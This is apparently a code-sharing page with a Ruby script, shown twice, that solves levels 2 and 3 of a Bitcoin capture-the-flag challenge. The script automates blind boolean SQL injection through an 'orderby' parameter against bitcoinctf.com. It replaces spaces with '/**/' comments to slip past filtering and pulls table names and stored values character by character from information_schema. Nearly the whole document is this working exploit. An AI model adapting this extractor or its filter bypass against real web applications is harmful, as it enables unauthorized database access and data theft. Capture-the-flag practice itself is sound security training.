firefart · May 4, 2013 17:59
diff --git a/bitcoinctf_level2_and_3.rb b/bitcoinctf_level2_and_3.rb
 #!/usr/bin/env ruby

 require 'net/http'
 require 'uri'

 def make_request(url, payload)
  uri = URI.parse("http://www.bitcoinctf.com#{url}")
 	params = {
 			:orderby => "1, (select case when (#{payload}) then 1 else 1*(select table_name from information_schema.tables)end)=1",
 			:limit => '1'
 	}
 	# replace spaces by comments. This is needed for level03
 	params[:orderby] = params[:orderby].gsub(/\s/, '/**/')
 	#puts params[:orderby]
 	uri.query = URI.encode_www_form( params )
 	Net::HTTP.get(uri)
 end

 def loop(url, select)
 	value = ''
 	counter = 1
 	complete = false
 	until complete
 		found_letter = false
 		(33..126).each { |ascii|
 			letter = ascii.chr
 			#puts letter
 			payload = "substr((#{select}),#{counter},1)='#{letter}'"
 			resp = make_request(url, payload)
 			unless resp == 'Unknown error'
 				#puts "Found #{letter}"
 				value << letter
 				counter = counter + 1
 				found_letter = true
 				break
 			end
 		}
 		complete = true if !found_letter
 	end
 	value.strip.downcase
 end

 ############
 # LEVEL 02 #
 ############
 puts 'Exploiting level02....'
 level02_url = '/b00kmarks.php'

 puts 'Getting table name...'
 table_sql = "SELECT table_name FROM information_schema.tables WHERE table_schema<>'information_schema' AND table_schema<>'mysql'"
 table_name = loop(level02_url, table_sql)
 puts "Table Name: #{table_name}"

 puts 'Getting flag for level02...'
 select = "select trim(url) from #{table_name} where deleted=1"
 value = loop(level02_url, select)
 puts "Value: #{value}"

 ############
 # LEVEL 03 #
 ############
 puts 'Exploiting level03....'
 level03_url = value

 puts 'Getting flag for level03...'
 select = "select trim(url) from #{table_name} where deleted=1"
 value = loop(level03_url, select)
 puts "Value: #{value}"
	#!/usr/bin/env ruby

	require 'net/http'
	require 'uri'

	def make_request(url, payload)
	uri = URI.parse("http://www.bitcoinctf.com#{url}")
	params = {
	:orderby => "1, (select case when (#{payload}) then 1 else 1*(select table_name from information_schema.tables)end)=1",
	:limit => '1'
	}
	# replace spaces by comments. This is needed for level03
	params[:orderby] = params[:orderby].gsub(/\s/, '/**/')
	#puts params[:orderby]
	uri.query = URI.encode_www_form( params )
	Net::HTTP.get(uri)
	end

	def loop(url, select)
	value = ''
	counter = 1
	complete = false
	until complete
	found_letter = false
	(33..126).each { \|ascii\|
	letter = ascii.chr
	#puts letter
	payload = "substr((#{select}),#{counter},1)='#{letter}'"
	resp = make_request(url, payload)
	unless resp == 'Unknown error'
	#puts "Found #{letter}"
	value << letter
	counter = counter + 1
	found_letter = true
	break
	end
	}
	complete = true if !found_letter
	end
	value.strip.downcase
	end

	############
	# LEVEL 02 #
	############
	puts 'Exploiting level02....'
	level02_url = '/b00kmarks.php'

	puts 'Getting table name...'
	table_sql = "SELECT table_name FROM information_schema.tables WHERE table_schema<>'information_schema' AND table_schema<>'mysql'"
	table_name = loop(level02_url, table_sql)
	puts "Table Name: #{table_name}"

	puts 'Getting flag for level02...'
	select = "select trim(url) from #{table_name} where deleted=1"
	value = loop(level02_url, select)
	puts "Value: #{value}"

	############
	# LEVEL 03 #
	############
	puts 'Exploiting level03....'
	level03_url = value

	puts 'Getting flag for level03...'
	select = "select trim(url) from #{table_name} where deleted=1"
	value = loop(level03_url, select)
	puts "Value: #{value}"